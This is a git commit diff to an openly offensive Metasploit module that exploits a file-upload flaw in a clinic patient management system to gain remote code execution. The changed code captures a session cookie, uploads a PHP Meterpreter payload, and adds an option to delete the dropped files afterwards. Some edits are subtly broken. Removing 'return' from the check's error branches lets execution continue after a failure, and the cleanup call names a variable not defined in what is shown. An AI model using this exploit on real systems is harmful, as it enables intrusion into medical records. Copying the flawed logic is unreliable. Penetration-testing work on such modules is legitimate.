Added the DELETE_FILES option to delete leftover files by the exploit with the FileDropper mixin

aaryan-11-x · aaryan-11-x · commit f5329a71df96 · 2024-12-17T17:00:06.000+05:30
diff --git a/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb b/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::PhpEXE
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -47,7 +48,8 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
-      OptInt.new('LISTING_DELAY', [true, 'Time to wait before retrieving directory listing (seconds)', 2])
+      OptInt.new('LISTING_DELAY', [true, 'Time to wait before retrieving directory listing (seconds)', 2]),
+      OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', false])
     ])
   end
 
@@ -63,20 +65,20 @@ def check
 
     unless res_session && res_session.code == 302 && res_session.get_cookies
       print_error('Server connect error. Couldn\'t connect or get necessary information - try to check your options.')
-      return CheckCode::Unknown
+      CheckCode::Unknown
     end
 
     phpsessid = res_session.get_cookies.match(/PHPSESSID=([^;]+)/)
     if phpsessid.nil?
       print_error('Failed to retrieve PHPSESSID. Target may not be vulnerable.')
-      return CheckCode::Unknown
+      CheckCode::Unknown
     else
       phpsessid = phpsessid[1]
       vprint_good("Obtained PHPSESSID: #{phpsessid}")
     end
 
     # Step 2: Attempt File Upload
-    dummy_filename = "#{Rex::Text.rand_text_alphanumeric(8)}.txt"
+    dummy_filename = "#{Rex::Text.rand_text_alphanumeric(8)}.png"
     dummy_content = Rex::Text.rand_text_alphanumeric(20)
     dummy_name = Rex::Text.rand_text_alphanumeric(6)
     post_data = Rex::MIME::Message.new
@@ -190,8 +192,7 @@ def upload_shell
     # Step 5: Upload the payload
     random_user = Rex::Text.rand_text_alphanumeric(8)
     random_password = Rex::Text.rand_text_alphanumeric(12)
-    payload_basename = Rex::Text.rand_text_alphanumeric(8).to_s
-    payload_filename = "#{payload_basename}.php"
+    payload_filename = "#{Rex::Text.rand_text_alphanumeric(8)}.php"
     print_status("Uploading PHP Meterpreter payload as #{payload_filename}...")
 
     post_data = Rex::MIME::Message.new
@@ -210,6 +211,7 @@ def upload_shell
 
     fail_with(Failure::UnexpectedReply, 'Failed to upload PHP payload') unless res && res.code == 302
     print_good('Payload uploaded successfully!')
+    register_file_for_cleanup(actual_detection_filename, payload_filename) if datastore['DELETE_FILES']
     payload_filename
   end
 
